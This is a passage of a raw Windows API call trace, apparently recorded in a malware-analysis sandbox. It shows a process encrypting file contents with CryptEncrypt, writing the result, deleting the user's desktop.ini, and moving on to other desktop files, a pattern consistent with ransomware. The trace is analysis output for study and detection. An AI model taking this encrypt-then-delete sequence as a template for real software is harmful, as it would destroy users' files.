HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11a) returned 0x43cc1c8 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.808] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.809] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.809] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.810] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e27b0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e27b0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.810] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0122.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0122.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.810] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x11a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x120) returned 1 [0122.810] CharLowerBuffW (in: lpsz="byte[289]", cchLength=0x9 | out: lpsz="byte[289]") returned 0x9 [0122.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.810] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43ead08*, pdwDataLen=0x144e790*=0x11a, dwBufLen=0x120 | out: pbData=0x43ead08*, pdwDataLen=0x144e790*=0x120) returned 1 [0122.818] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.818] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.818] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.818] WriteFile (in: hFile=0x2a0, lpBuffer=0x43cc1c8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43cc1c8*, lpNumberOfBytesWritten=0x144f194*=0x120, lpOverlapped=0x0) returned 1 [0122.819] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.820] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0122.820] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.820] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.820] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.820] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.820] CloseHandle (hObject=0x258) returned 1 [0122.821] CloseHandle (hObject=0x2a0) returned 1 [0122.821] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFilePart=0x0) returned 0x23 [0122.821] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 0x26 [0122.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0122.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0122.822] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41abfc0 [0122.822] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 1 [0122.823] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0122.823] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0122.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0122.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0122.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.824] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.824] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.824] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.824] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.824] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0122.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9e48 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0122.825] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0122.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.826] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.826] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\f9lcZFridHfs.rtf", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0671400, ftCreationTime.dwHighDateTime=0x1d5ef84, ftLastAccessTime.dwLowDateTime=0x6169ec90, ftLastAccessTime.dwHighDateTime=0x1d5e98d, ftLastWriteTime.dwLowDateTime=0x6169ec90, ftLastWriteTime.dwHighDateTime=0x1d5e98d, 